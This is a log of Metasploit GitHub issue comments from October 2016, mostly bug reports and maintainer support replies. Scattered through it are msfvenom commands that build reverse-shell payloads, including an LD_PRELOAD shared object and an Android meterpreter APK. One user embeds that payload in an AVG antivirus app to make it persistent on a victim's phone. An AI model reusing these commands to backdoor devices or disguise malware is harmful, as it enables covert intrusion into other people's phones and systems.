I've found 2 issues with this procedure.
### Code is not expecting JSON arrays
If we check the code where the procedure is performed, we can see that the comparison of the status is made directly with a string. This is probably a migration issue

[2016-10-02 20:29] roman-mueller commented on #7389
I think this commit at rapid7/rex-bin_tools causes it: https://github.com/rapid7/rex-bin_tools/commit/fd05b9bca54856a33b4dd9a5ae996e63650c4056#diff-ff5e8831e93a9654c36b0839b36c59ab

[2016-10-02 20:37] hacksoldier98 commented on #7386
I tried to give the command that you told me but it happened this:

am startservice com.metasploit.stage/.MainService
Starting service: Intent { act=android.intent.action.MAIN cat=[android.intent.category.LAUNCHER] cmp=com.metasploit.stage/.MainService }
java.lang.SecurityException: Permission Denial: service asks to run as user -2 but is calling from user 0; this requires android.permission.INTER

[2016-10-02 20:39] hacksoldier98 commented on #7386
if I put the permissions inside the meterpreter, it might work?

[2016-10-03 00:14] wvu-r7 commented on #7389
I think someone got happy with ```sed```. :)

[2016-10-03 00:43] #7389 closed

[2016-10-03 00:48] bcook-r7 commented on #7388
Thanks, fix forthcoming.

[2016-10-03 00:58] wvu-r7 commented on #7389
@roman-mueller: This will be fixed in the next gem update. Thanks for the report!

[2016-10-03 01:22] #7388 closed

[2016-10-03 02:37] bcook-r7 commented on #7391
Thanks for the analysis @henshin - would you be able to submit a pull request with the fixes outlined above?

[2016-10-03 02:42] bcook-r7 commented on #7358
Ah, so if you're running on Kali, please stick to Kali's packaging. Please perform the following commands to restore the Kali-specific package on your installation.

[code]

[2016-10-03 02:42] #7358 closed

[2016-10-03 02:44] bcook-r7 commented on #7358
As you can see from the error above, it is saying not to run msfdb as root, but the '[root:~]#' prompt indicates that you are running the command as root anyway.

If you switch to Kali's package instead, it is designed to use the system installation of postgresql, and its copy of msfdb expects to be run as root like other Kali Linux tools.

[2016-10-03 02:46] wvu-r7 commented on #7073
I forgot I was going to do this.

[2016-10-03 02:47] bcook-r7 commented on #7358
If someone wants to submit a PR to make the omnibus package work with a root user, the repo and script are here: https://github.com/rapid7/metasploit-omnibus/blob/master/config/templates/metasploit-framework/msfdb.erb

It's designed to work this way because postgresql itself refuses to run as root, and the omnibus package doesn't add any users to the system, since this might step on other packages

[2016-10-03 02:50] timwr commented on #7386
Unfortunately this is because you're running on Android 6.0. That command will only work on Android 4.2 and lower. What makes you think the apk isn't currently persistent? Does the session not reconnect when you restart the device?

[2016-10-03 05:31] hacksoldier98 commented on #7386
No, it doesn't. I tried so many times but there is no persistence. I before this apk new hiding while other one not, because it worked great persistence works fine on Android 6.0 devices

[2016-10-03 09:56] busterb commented on #7386
@timwr would you like me to back out rapid7/metasploit-payloads#104 to switch it to configurable behavior later? I've been teaching a few folks here how to use Android meterpreter lately, and this is something that has been confusing for them too.

Granted, I haven't experienced a lack of persistence locally. Sounds like we might be debugging 2 problems here. Technically @hacksoldier98's original

[2016-10-03 10:02] timwr commented on #7386
Agreed this is confusing for people. Let's revert for now and I can make it configurable later on.
Apologies!

[2016-10-03 10:10] timwr commented on #7386
@hacksoldier98 my mistake. I thought on Android 4.3 and up the ```am startservice``` was blocked, but it actually still works if you include the --user 0 argument, e.g you can still do:
```am startservice --user 0 com.metasploit.stage/.MainService```

[2016-10-03 10:13] hacksoldier98 commented on #7386
sorry @timwr but not work. i have this error:
Error: Requires permission not exported from uid 10255

[2016-10-03 13:41] Megaeloelo opened #7393 "More android root exploits."
Is it possible to add the pingpong root and iovy root exploits to the android payload?
Sorry for bad english.

[2016-10-03 16:06] Tinydile commented on #7036
I could successfully installed by:
# apt-get install ruby openssl
# apt-get install zlib1g-dev libssl-dev
# apt-get install metasploit-framework

[2016-10-03 16:07] Tinydile commented on #7036
I successfully installed by:
[code]

[2016-10-03 16:20] wvu-r7 commented on #7393
I think @jduck has some planned.

[2016-10-03 16:21] henshin commented on #7391
Sure, I'll provide you with the pull request later today

[2016-10-03 16:28] RealPariah commented on #3802
WOW, JUST WOW, I have not needed metasploit in some time and then I come back to find forced registration with too much personal info, CLI is GONE (this thing emulates but is not true CLI).  No wonder your stock has taken huge hits.  A security company asking for my personal details to download Open Source software; I just find that so ironic it KILLS me.

[2016-10-03 16:35] bcook-r7 commented on #3802
Nice troll. If you want just the CLI / open source, go ahead and install it: https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers

Or grab Kali or any of the other security distributions that come with it pre-packaged.

[2016-10-03 17:32] hdm commented on #3802
If only it killed him

[2016-10-03 21:35] OJ commented on #3802
1. Locate source code of open source project.
1. Post ignorant & incorrect ranty comment on an unrelated issue.
1. Fail to notice the irony of posting rant in said location.
1. Look stupid.
1. Profit?

[2016-10-04 02:10] mach-0 opened #7397 "elf-so payload crashes when used with LD_PRELOAD"
Trying to use the `elf-so` payload with `LD_PRELOAD` causes a segfault. This would be very useful e.g. in the presence of environment variable injection for privilege escalation.

## Steps to reproduce

How'd you do it?

1.

        $ ./msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.1.3 LPORT=4444 -f elf-so > /tmp/elf.so

2.

        $ LD_PRELOAD=/tmp/elf.so /bin/true
        Segmentation f

[2016-10-04 15:01] #7397 closed

[2016-10-04 16:16] dmaloney-r7 commented on #7309
@Bruk0ut https://github.com/rapid7/metasploit-framework/pull/7374 fixes the specific issue you mentioned but we still can't seem to get it to work. it sounds from your ticket like it did work for you. are we missing something when we try to repro?

[2016-10-04 16:41] dmaloney-r7 commented on #7309
@Bruk0ut nm, it was a stupid environmental issue

[2016-10-04 19:45] pbarry-r7 commented on #7309
Verified as fixed via [PR-7374](https://github.com/rapid7/metasploit-framework/pull/7374).

[2016-10-04 19:45] #7309 closed

[2016-10-05 03:47] nitob commented on #7386
Will not run am com.metasploit.stage/.MainService
no apk   /data/app

[2016-10-05 07:15] hacksoldier98 commented on #7386
Because you haven't installed malware.apk in your telephone.

[2016-10-05 11:47] arisada opened #7403 "Meterpreter's TCP forwarding incorrectly reorders packets"
I noticed that some TCP sessions forwarded over a meterpreter session were not usable with SSH. Symptoms were hung sessions.

[code]

The session is a x86 meterpreter running on a windows2008r2 server.
This is what happens when I try to log in using this socks server:

[code]

The ssh_exchange_identification don't look right. I ran another command to confirm my suspicions:

[code]

The SSH banner

[2016-10-05 13:33] lvarela-r7 commented on #7403
Worked with Aris and could not reproduce:  http://pastebin.com/FAnDpzcm
http://pastebin.com/fcU9UbmY
Maybe some environment issue on his side. Will leave this open in case other people can reproduce.

[2016-10-05 14:12] busterb commented on #7403
@dmaloney-r7 , please take a look - this may be more regressions due to Rex gem split-ups. Exception is happening close to rex-core

[2016-10-05 14:14] bcook-r7 commented on #7403
@lvarela-r7 often to simulate real scenarios, you need to separate framework from the payload via some sort of real network. Often bugs that show up talking to real machines across the internet cannot be reproduced on low-latency, high-throughput VMs and such. I recommend turning on 'Network Link Conditioner' on OS X to configure more realistic networking.

[2016-10-05 14:33] arisada commented on #7403
I just re-trigged this bug with windows/meterpreter/reverse_tcp and windows/x64/meterpreter/reverse_tcp.

[2016-10-05 15:07] pat-riot opened #7404 "auxiliary/fuzzers/ntp/ntp_protocol_fuzzer NoMethodError undefined method `split' for nil:NilClass"
Running auxiliary/fuzzers/ntp/ntp_protocol_fuzzer fails with error "NoMethodError undefined method `split' for nil:NilClass".

## Steps to reproduce
msfconsole:
[code]

Relevant info from framework.log:
[code]

## System stuff

### Metasploit version

Framework: 4.12.28-dev
Console  : 4.12.28-dev

### I installed Metasploit with:
- [X ] Kali package via apt

### OS

Linux kali 4.6.0-kali1-686-pae

[2016-10-05 15:24] wvu-r7 commented on #7393
Gonna close this, since they should be forthcoming. Thanks for the request.

[2016-10-05 15:24] #7393 closed

[2016-10-05 15:39] hacksoldier98 commented on #7386
@Timwr are you trying to find the bug? if you have problems I can try to help but i didn't know much java

[2016-10-05 17:31] FusionPyro opened #7406 "Auxiliary failed: NoMethodError"
Hello, when ever i try to SYN flood i always get this error:
Auxiliary failed: NoMethodError undefined method `<=' for nil:NilClass
Did you mean?  <=>
[-] Call stack:
[-]   /usr/share/metasploit-framework/modules/auxiliary/dos/tcp/synflood.rb:57:in `run'
How can i fix this?

[2016-10-05 18:15] void-in commented on #7406
This is a dup of https://github.com/rapid7/metasploit-framework/issues/7264. Please follow the advise there. It totally go off my radar. If no one generated a PR, I will do it tomorrow morning (it is quite late here and I am away from my dev machine). Will keep it open so that I don't forget about it. Thanks

[2016-10-05 18:53] wvu-r7 commented on #7406
I'll fix it.

[2016-10-05 19:58] wvu-r7 commented on #7406
Leo is going to fix it. :P

[2016-10-05 20:19] #7406 closed

[2016-10-05 20:27] #7404 closed

[2016-10-06 05:29] timwr commented on #7386
@hacksoldier98 I can't reproduce this unfortunately. Both ```am start``` and ```am startservice``` appear to work in the same way for me. We've reverted a change that prevented the am start command from working a second time.
The important thing is you actually shouldn't need to run either of those as the payload should be persistent anyway! If you're following this tutorial: http://null-byte.wond

[2016-10-06 06:33] hacksoldier98 commented on #7386
@timwr Yes it is always the same but the Lhost continues not to go there I am StartService am start. To tell the truth StartService part but as soon as I exit and then immediately exploits I have to wait long before it is connected or not return once more the connection

[2016-10-06 07:19] hacksoldier98 commented on #7386
@Timwr Tim Now I created a shell that says this:
#!/bin/bash
am startservice --user 0 com.metasploit.stage/.MainService
am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity

after I saved and I installed the backdoor with my public ip with the door attached to my local ip. after the installation was carried out I crushed on open and your computer's connection. from

[2016-10-06 12:57] bcook-r7 commented on #7403
I was able to reproduce this pretty easily.

To rule out meterpreter itself reordering the packets, I modified the channel_read/write routines from running asynchronously to running inline, which means that the packets should be sent in the order they are received. This had no effect.

I also went back about 4 months in code and the same thing is happening (including the unhandled exceptions liste

[2016-10-06 12:59] OJ commented on #7403
No doubt this will be a fabulous one to fix :)

[2016-10-06 14:50] Sanya1991 commented on #7036
After I installed veil-evasion (apt-get install veil-evasion) I got the same error. I've read Tinydile post, and I tried this: apt-get install openssl. The problem was gone, metasploit is working, veil-evasion as well.

[2016-10-06 22:00] hacksoldier98 opened #7410 "bug to using apk template"
hi is always me and now I have this other problem encountered while trying to enter the payload inside the avg program:
msfvenom -p Android / meterpreter / reverse_tcp Lhost = my-my-ip LPORT = -x port avg-antivirus.apk -o meterpreter.apk
Using APK template: avg-antivirus.apk
No platform was selected, choosing MSF :: Module :: Platform :: Android from the payload
No Arch selected, Selecting Arch: D

[2016-10-06 22:31] bcook-r7 commented on #7410
'Error: Zipalign not found. If it's not in your PATH, please add it.'

You want to grab the android dev tools and put them in your path for this to work.

[2016-10-07 04:32] timwr commented on #7410
on ubuntu: `sudo apt install zipalign`

[2016-10-07 09:33] hacksoldier98 commented on #7410
Okay now running thanks

[2016-10-07 09:47] hacksoldier98 commented on #7386
@timwr now the command for use as a template doesn't work.. because as soon as I install it on the device goes into crash.. and the connection is only at that moment when you open the program until it stops.. I used avg antivirus for to put in the malware

[2016-10-07 12:51] bcook-r7 commented on #7410
coolio

[2016-10-07 12:51] #7410 closed

[2016-10-08 07:07] mahmoudissam commented on #7386
Any solution to this issue soon?  there is noway currently to make the Android payload persistent..

[2016-10-08 09:18] Luis-Hebendanz opened #7415 "[Bug] autopwn2 server throws exception on html response - Part 2"
Note: This is the follow-up to my previous and now closed bug in autopwn2. #7388
The error message changed a bit the problem stays the same.

## Steps to reproduce
With a clean install of metasploit development and a new .msf4 folder I started the autopwn2
module and hit run:

Then I connected with my firefox browser to the given URL and this error pops up:

## System stuff
This was on an Ubuntu m

[2016-10-08 19:44] timwr commented on #7386
Apologies for the delay. This is getting a bit confusing as there are few potential issues flying around.
- The original issue: "the first time but the second works by this error" `Error: Activity class {com.metasploit.stage/com.metasploit.stage.MainActivity}` has been fixed. I'm (perhaps pre-emptively) closing this issue.
- I don't recommend using the bash script method for persisting an Android

[2016-10-08 19:44] #7386 closed

[2016-10-08 21:32] mahmoudissam commented on #7386
Thanks!

Regarding "Without -x the Android payload should already be persistent, if not this is a bug. I'll look into this further."

It depends on how you define persistent.
I generated the payload without X, it connects only in two cases:
1- Once you install it and open it the first time.
2- And when the victim reboots the phone.

But it does not try to reconnect every 20 seconds for example...

[2016-10-09 02:32] #7147 closed

[2016-10-09 02:48] bcook-r7 commented on #7415
I should be able to get you going again, I see the broken commit (it's nothing that important).

[2016-10-09 02:52] h00die commented on #6928
@wchen-r7 @bcook-r7 merged, can now be closed.

[2016-10-09 02:55] dirschneid opened #7416 "Describe your feature request or bug report, succinctly"
If you'd like to propose a feature, describe what you'd like to see. Mock ups of console views would be great.

If you're reporting a bug, please be sure to include the expected behavior, the observed behavior, and steps to reproduce the problem. Resource scripts, console copy-pastes, and any background on the environment would be appreciated.

For tips, see http://r-7.co/MSF-CONTRIB

[2016-10-09 03:21] bcook-r7 commented on #6928
Ah, thanks. Add 'closes #6928' to the PR description next time and github will do it automatically :)

[2016-10-09 03:21] #6928 closed

[2016-10-09 03:21] bcook-r7 commented on #7416
Oops?

[2016-10-09 03:21] #7416 closed

[2016-10-09 03:39] #7415 closed

[2016-10-09 03:42] bcook-r7 commented on #7390
@wchen-r7 is it expected for browser autopwn2 to also run the check methods for each exploit before it does the exploitation?

[2016-10-09 03:49] h00die commented on #6928
whoa, didn't know that!  I think I've seen that before, just didn't realize that made it an automatic thing.  I'll try to remember that hawt shortcut

[2016-10-09 03:49] bcook-r7 commented on #7403
This is looking more like a flushing issue than an ordering issue. I suspect that somewhere between socks4a reading a packet and forwarding it to the meterpreter channel, it gets stuck in a queue. Then on the subsequent connection, the last packet from the last connection is sent first, followed by the first packet on the new proxy connection.

Verified that the first time the proxy is started, be

[2016-10-09 03:52] h00die commented on #7370
@madmike33 are you working on freepbx or finding all missings?  Any status updates?

[2016-10-09 09:05] timwr commented on #7386
@mahmoudissam , when I switch Wifi off I get a new session over the data connection, and a new one again when I re-enable Wifi. I'll try leaving a few phones overnight, using lots of memory, etc.
- Is the LHOST on the handler you start exactly the same as the LHOST on the payload?
- Which payload are you using? e.g I'm testing with android/meterpreter/reverse_tcp
- Are you sure you're setting `set

[2016-10-09 09:13] mahmoudissam commented on #7386
Hello Mate, thanks for your reply!

Here is the info:

1- Yes the LHOST are the same.
2- The command I use:
msfvenom -p android/meterpreter/reverse_tcp LHOST=domain.com LPORT=4444 R >shell.apk
3- I just use exploit (without -j) , do I have to add -j ?

[2016-10-09 09:42] Luis-Hebendanz commented on #7415
Thank you very much :)

[2016-10-09 10:19] Qubasa commented on #7390
Well its not exactly the check method but a method defined in
[code]
and if it doesn't get executed its pretty confusing because its nowhere documented. Also it leads to problems like in the android exploit samsung_knox_mdm_url. Where it only checks in the BrowserRequirements if it is an android device and if it has javascript enabled. Then it redirects the victim to the exploit url. In consequenc

[2016-10-09 14:52] devrajashwin opened #7419 "Failed to load module: exploit/android/browser/stagefright_mp4_tx3g_64bit"
when i use this msfconsole it gives me an error for rb

msf  > use exploit/android/browser/stagefright_mp4_tx3g_64bit

Failed to load module: exploit/android/browser/stagefright_mp4_tx3g_64bit
any help plz

[2016-10-09 15:06] void-in commented on #7419
How you installed Metasploit? git clone? Kali? Binary installer? And have you updated it?

[2016-10-09 15:35] kalifan opened #7420 "Failed to load module: exploits/windows/misc/regsvr32_applocker_bypass_server.rb"
Hi, i have a problem, i cant load this exploit i get this following error:

[-] WARNING! The following modules could not be loaded!
[-] 	/root/.msf7/modules/exploits/windows/misc/regsvr32_applocker_bypass_server.rb: Msf::Modules::MetasploitClassCompatibilityError Failed to load module (windows/misc/regsvr32_applocker_bypass_server from /root/.msf7/modules/exploits/windows/misc/regsvr32_applocker_b

[2016-10-09 16:38] nixawk commented on #7370
If you want, please set up a vuln-lab. - References:

https://github.com/FreePBX/framework/releases.
http://www.tecmint.com/how-to-install-asterisk-11-in-linux-distributions/
http://wiki.freepbx.org/display/FOP/Install+FreePBX

![screen shot 2016-10-09 at 11 33 21](https://cloud.githubusercontent.com/assets/7352479/19221998/475e620e-8e14-11e6-8436-92817ef31d8f.png)

The module fails to exploit **F

[2016-10-09 16:53] nixawk commented on #7370
[code]

[2016-10-09 18:22] ZoeLe opened #7421 "python payload syntax error."
## Expected behavior

What should happen?
I am expecting this will open a shell, or at least say the the connection is refused.

## Current behavior
The problem is that I run the python script on the victim (I tried python3 even though I think this is a python2 script), and this is the output:
[code]
## System stuff
### Metasploit version
This is the latest metasploit version.

### I installed Met

[2016-10-09 18:29] bcook-r7 commented on #7421
It looks like your output format was not '-f raw' when you generated the payload. Notice that it's saying that the file already contains 'python -c' invocation in the file!

Either edit the file and remove the 'python -c "', and the trailing quote as well, or generate the file with the 'raw' format if you want to just write a python file directly.

[2016-10-09 18:29] #7421 closed

[2016-10-09 18:34] ZoeLe commented on #7421
Just tried it. It works great now. thanks you so much!

[2016-10-09 18:37] wvu-r7 commented on #7421
It actually looks like you used ```cmd/unix/reverse_python``` instead of ```python/shell_reverse_tcp```. Raw won't change whether it's a native payload or a command payload.

[2016-10-09 18:43] wvu-r7 commented on #7421
[code]

Cheers!

[2016-10-09 18:48] wvu-r7 commented on #7421
As you can see, ```python/shell_reverse_tcp``` is "native" and doesn't generate a ```python -c```:

[code]

[2016-10-09 18:49] wvu-r7 commented on #7421
FYI, if you pick a ```cmd/unix``` payload, it would be used for a shell command injection.

[2016-10-09 18:51] wvu-r7 commented on #7421
In an ideal world, the same payload could be generated both ways. Notice how there are no native Perl payloads, only command payloads.

[2016-10-09 18:56] wvu-r7 commented on #7419
You probably don't have it yet, as @void-in is suggesting.

[2016-10-09 18:57] wvu-r7 commented on #7420
That module is from June. You should have it in the tree.

[2016-10-09 18:58] wvu-r7 commented on #7420
Notice that you're trying to load it from ```/root/.msf7```, which makes no sense.

[2016-10-09 18:59] wvu-r7 commented on #7420
FWIW, the constant should be ```MetasploitModule```, not ```Metasploit4``` or ```Metasploit3```. Seems you have an outdated version of the module being loaded under a personal path.

[2016-10-09 19:00] wvu-r7 commented on #7420
And you don't need a ```foo.rb```. That was just an example.

[2016-10-09 23:22] h00die commented on #7370
I will add that EDB didn't verify the sploit, however it does look like it was real according to [their site](http://wiki.freepbx.org/display/FOP/2016-08-09+CVE+Remote+Command+Execution+with+Privileged+Escalation)

[2016-10-09 23:32] kalifan commented on #7420
Thanks for answer me, but i must tell you the reason that i download it this exploit from github it is because it does not exist into modules kali linux:
![2016-10-09_202530](https://cloud.githubusercontent.com/assets/22728873/19224577/1452832c-8e5f-11e6-95cc-768a0d9f5c91.png)

if you see must be there under realtek_playlist. please i need your help i want use that exploit. tell what i must to do

[2016-10-10 04:30] nitob commented on #7386
If install the apk from root then you will work team. am and it is not necessary to specify --user 0

[2016-10-10 04:32] nitob commented on #7386
if the program was running as root then am runs it as root even if the user is not root

[2016-10-10 07:26] AMAN1312 opened #7425 "FATAL: password authentication failed for user "msfdev" | HELP!!!"
# HELP!!!

I installed the Metasploit-framework (dev) from-
https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment

After entering 'msfconsole' in the terminal, it says-
FATAL:  password authentication failed for user "msfdev"

## Expected behavior

according to the guide it will not show any error and connect with the database "msfdev"

## Current beha

[2016-10-10 12:00] kevinclaassens opened #7426 "Failure to upload"
I am using Kali Linux 2.0 with virtualbox.
I am doing some tests and I am able to gain a meterpreter session on the device. I then dropped into shell to try and upload a file. I am unable to upload a file using the upload command. Ex I used it like this 'upload file.jpg' keeping in mind that the file.jpg is on my desktop. I then tried it like this 'upload root/Desktop/file.jpg' with both of those

[2016-10-10 13:59] bcook-r7 commented on #7426
You cannot upload files from a shell session. please background the shell and upload from the meterpreter prompt instead.

Also, please ask questions about metasploit usage on community.rapid7.com, not the github project.

[2016-10-10 13:59] #7426 closed

[2016-10-10 14:03] bcook-r7 commented on #7425
Looks like exactly what it's telling you - the password in your database.yml file doesn't match the password for the msfdev user.

Carefully examine your setup again, and perhaps look at the 'Vagrantfile' for hints on the commands you would run to set up a development environment and configure a matching password for your database user. I'd also recommend posting support questions like this on htt

[2016-10-10 14:03] #7425 closed

[2016-10-10 14:16] void-in commented on #7425
In addition to the @bcook-r7 answer, I would recommend that if you just want to use msf and not into the dev side, then use a binary/omnibus installer or use the built-in Metasploit package that comes with the Kali Linux. Those are easy to setup compared to the development environment setup.

[2016-10-10 20:26] #7391 closed

[2016-10-10 21:03] wvu-r7 commented on #7420
Try updating Kali.

[2016-10-10 21:08] wvu-r7 commented on #7420
Do you know how to update Kali? Do that.

[2016-10-10 21:09] wvu-r7 commented on #7420
If you can't do that, put https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/windows/misc/regsvr32_applocker_bypass_server.rb in ```~/.msf4/modules/exploits/windows/misc```.

[2016-10-10 21:10] #7420 closed

[2016-10-10 21:11] wvu-r7 commented on #7419
Same as #7420.

[2016-10-10 21:11] #7419 closed

[2016-10-10 21:13] wvu-r7 commented on #7420
FYI, filing a ticket is for bug reports or feature requests, not for support questions. Please go to the  #metasploit IRC channel on freenode or the Rapid7 Community website at https://community.rapid7.com/.

[2016-10-10 21:13] wvu-r7 commented on #7419
FYI, filing a ticket is for bug reports or feature requests, not for support questions. Please go to the  #metasploit IRC channel on freenode or the Rapid7 Community website at https://community.rapid7.com/.

[2016-10-11 01:21] bcook-r7 commented on #6272
I think it is safe to say that the original issue reported here has long since been fixed.

[2016-10-11 01:21] #6272 closed

[2016-10-11 01:25] bcook-r7 commented on #6863
Doesn't seem like there has been much movement with packetfu since this announcement. Anything we can do here to help usher 1.1.12 into the world?

[2016-10-11 01:27] bcook-r7 commented on #6770
@darkbushido has something that I believe will finally address this issue :)

[2016-10-11 01:27] bcook-r7 commented on #6740
Landed, thanks!

[2016-10-11 01:27] #6740 closed

[2016-10-11 01:33] bcook-r7 commented on #6034
Closing on account of there was a solution to the issue.

[2016-10-11 01:33] #6034 closed

[2016-10-11 01:34] bcook-r7 commented on #5888
This seems to be fixed now.

[2016-10-11 01:34] #5888 closed

[2016-10-11 01:34] bcook-r7 commented on #5852
Fixed a while back.

[2016-10-11 01:34] #5852 closed

[2016-10-11 01:38] #4339 closed

[2016-10-11 01:38] #4350 closed

[2016-10-11 01:38] #4351 closed

[2016-10-11 01:38] #4352 closed

[2016-10-11 01:38] #4353 closed

[2016-10-11 01:38] #4354 closed

[2016-10-11 01:38] #4355 closed

[2016-10-11 01:38] #4367 closed

[2016-10-11 01:38] #4370 closed

[2016-10-11 01:43] bcook-r7 commented on #3809
Merging with #6770, which @darkbushido owns.

[2016-10-11 01:43] #3809 closed

[2016-10-11 08:33] hacksoldier98 commented on #7386
but it is always better to put --user 0 in the am

[2016-10-11 13:34] bwatters-r7 commented on #7337
@dmaloney-r7 ?

[2016-10-11 15:11] bwatters-r7 commented on #5815
This might be the same problem I'm hitting on another project where some of the DB's custom integrity checks rely on ANSI encoding or some horror-show half-encoding that I've found in other places..

[2016-10-11 17:47] petryn4ik opened #7431 "Meterpreter commands don't run"
I have got meterpreter session using exploit/multi/handler and php/meterpreter/reverse_tcp. The problem is i can't execute ANY command. (Command not found)

[2016-10-11 18:02] pbarry-r7 commented on #7431
Can you provide the info/details that the New Issue template requests?  e.g. what version of metasploit you are using, how it was installed (kali, github clone, what specific commands aren't working, etc.)  Screenshots of your msfconsole would be helpful, as well.

[2016-10-11 18:38] petryn4ik commented on #7431
It was github clone. Version v4.12.33-dev-55348d7. Commands like ps, migrate etc. help is working. modules aren't working too. Tried Linux x64/Windows 7 x86/Windows 7 x64 Commands:
`use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 192.168.0.108
set LPORT 4444
exploit`

Screenshot: http://oi68.tinypic.com/vfldnq.jpg

[2016-10-11 18:39] petryn4ik commented on #7431
It was github clone. Version v4.12.33-dev-55348d7. Commands like ps, migrate etc. help is working. modules aren't working too. Tried Linux x64/Windows 7 x86/Windows 7 x64 Commands:
`use exploit/multi/handler`
`set payload php/meterpreter/reverse_tcp`
`set LHOST 192.168.0.108`
`set LPORT 4444`
`exploit`

Screenshot: http://oi68.tinypic.com/vfldnq.jpg

[2016-10-11 19:01] bcook-r7 commented on #7431
How did you make a the stage that is connecting here?

[2016-10-11 19:09] petryn4ik commented on #7431
connected to 192.168.0.108:4444

[2016-10-11 19:14] petryn4ik commented on #7431
via Google Chrome

[2016-10-11 20:01] wvu-r7 commented on #7431
Wat.

[2016-10-11 20:08] dhn opened #7434 "nessus_db_scan_workspace: wrong number of arguments (given 4, expected 2)"
I've try to use the new `nessus_db_scan_workspace` function but unfortunately the `mfconsole` failed with an exception (see below).

[code]

[code]

Tested on Kali Linux.

[2016-10-11 20:09] petryn4ik commented on #7431
Mean, from client computer.

[2016-10-11 20:19] bcook-r7 commented on #7431
Ah, then I think you're misundestanding how payloads work. You don't connect to that URL via a web browser. You either need to create a stager via msfvenom, run an exploit, any number of things. You may find these training materials helpful: https://www.offensive-security.com/metasploit-unleashed/

[2016-10-11 20:19] #7431 closed

[2016-10-12 09:19] h00die opened #7437 "ams_hndlrsvc and/or cmdstager tftp issue(s)"
# ams_hndlrsvc broken

I attempted to use `exploits/windows/antivirus/ams_hndlrsvc` on a known vuln target.

[code]

It failed.  In order to start debugging, I added a `print_good(cmd)` to line [67](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/antivirus/ams_hndlrsvc.rb#L67) to see what commands were being sent in the command injection.  The results:

[code]

[2016-10-12 09:20] h00die commented on #7437
I have working code which drops tftp stager and does the tftp server call manually. Works great, and I can PR it, but i think its not the best way to go.  I can upload it though if someone wants to see it

[2016-10-12 13:54] nixawk commented on #7370
Any body check it ? my lab problems ?

<img width="932" alt="screen shot 2016-10-12 at 08 43 03" src="https://cloud.githubusercontent.com/assets/7352479/19312437/f38adeb4-9057-11e6-8927-a8cb80e51442.png">

[2016-10-12 14:51] dmaloney-r7 commented on #7337
I don't know when this actually stopped working but it was broken before we did the Rex Breakup. It looks like it has been busted for a long time

[2016-10-12 15:05] nixawk commented on #7370
## /var/www/html/freepbx2/admin/modules/hotelwakeup/Hotelwakeup.class.php

[code]

[code]

[2016-10-13 00:21] h00die commented on #7370
double check your version, if I remember correctly, FreePBX will perform an update on boot, so if you don't deny its internet access it may have updated on you while you were using it

[2016-10-13 13:24] jvoisin opened #7438 "Automatically `reload` the edited module upon `edit`"
It would be handy if metasploit could automatically reload modules upon edition, since most of the time, when you're editing a module, you're planning to use it, and to do so, you need to reload it.

## Steps to reproduce

1. `use` a module
2. type `edit`
3. change some stuff
4. quit your text editor

## Expected behaviour

The module should be automatically reloaded

## Current behaviour

The mod

[2016-10-13 17:15] wvu-r7 commented on #7438
We explicitly left this out for reasons I've forgotten.

[2016-10-13 17:21] wvu-r7 commented on #7438
FWIW, it's still two commands: ```edit``` and ```rerun```.

[2016-10-13 17:35] wvu-r7 commented on #7438
See #2504.

[2016-10-13 21:21] OJ commented on #7438
I would prefer not to have it auto loaded when there's a modification. When
editing modules I don't always want my saved version loaded as I often have
broken/debug code that either does not work or does something that I don't
want occurring during the next invocation.

I'd much prefer manually using `rexploit`, it leaves the control in my
hands. Too much magic can get frustrating imho.

[2016-10-13 22:21] wvu-r7 commented on #7438
Sorry, this will kill us and many other users of this command! Thank you for the suggestion. :<

[2016-10-13 22:21] #7438 closed

[2016-10-14 12:14] nixawk opened #7441 "Is it necessary to add [post/linux/gather/enum_linux] ?"
## Steps to reproduce

How'd you do it? Please get a linux/meterpreter shell at first, ex: session 1.
1. use post/linux/gather/enum_linux
2. set SESSION 1
3. run

This section should also tell us any relevant information about the
environment; for example, if an exploit that used to work is failing,
tell us the victim operating system and service versions.
## Expected behavior

This module gathers

[2016-10-14 15:17] wvu-r7 commented on #7441
Does it have feature parity with the existing Linux enumeration modules? If so, which ones? Can you replicate the functionality with a resource file? Some questions.

Honestly, I think your module rocks. I'm personally hesitant to be so aggressive at checks, especially the loud ones, but lots of folks can find it useful.

[2016-10-14 16:38] b0cq commented on #7371
anyone have ideas of how to export "preshare key" or decrypt vpn traffic?

[2016-10-14 17:44] #7148 closed

[2016-10-14 22:31] h00die opened #7443 "Module Request: Linux Local CVE-2016-4997"
This is on my to do list, but if someone wants to get to it before me, please put a comment in to claim it to prevent duplication of efforts.

[edb](https://www.exploit-db.com/exploits/40489/)

VMs to test [reference](https://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-4997.html):
- Ubuntu 12.04 LTS kernel < 3.13.0-91
- Ubuntu 14.04(.1) LTS kernel < 4.2.0-41
- Ubuntu 16.04.1 LTS kernel

[2016-10-14 22:37] h00die opened #7444 "Module Request: Linux Local Tomcat Escalation"
This module will exploit two CVEs to cover all of the possible platforms: [edb](https://www.exploit-db.com/exploits/40488/) [edb](https://www.exploit-db.com/exploits/40450/)

Should be tested vs tomcat 6, 7, 8 on centos/fedora, and debian/ubuntu.

Not that I love them anyways, but module docs will be really important for this one.  Mainly because in the comments of that edb code it says that execu

[2016-10-14 22:48] h00die commented on #7444
also keep in mind, EDB did not verify them.

[2016-10-14 22:49] h00die opened #7445 "Module Request: Linux Local abrt/sosreport"
This is on my to do list, but if someone wants to get to it before me, please put a comment in to claim it to prevent duplication of efforts.

You'll want to combine two sets of code into this one module:
[edb](https://www.exploit-db.com/exploits/38832/) and [edb](https://www.exploit-db.com/exploits/38835/)

[2016-10-14 22:52] wvu-r7 commented on #7443
Thank you for putting up these tickets. It really helps us avoid stepping on each other's toes!

[2016-10-15 02:51] nixawk commented on #7371
From http://arstechnica.com/security/2016/08/cisco-firewall-exploit-shows-how-nsa-decrypted-vpn-traffic/

[2016-10-15 09:27] justinsteven commented on #7444
I'm working on 40450 (Apache Tomcat 8/7/6 (Debian-Based Distros) - Privilege Escalation)

Certainly not guaranteeing I'll do a good job of it. If anyone else has something in the works, please keep on keeping on.

[2016-10-15 13:15] h00die commented on #7444
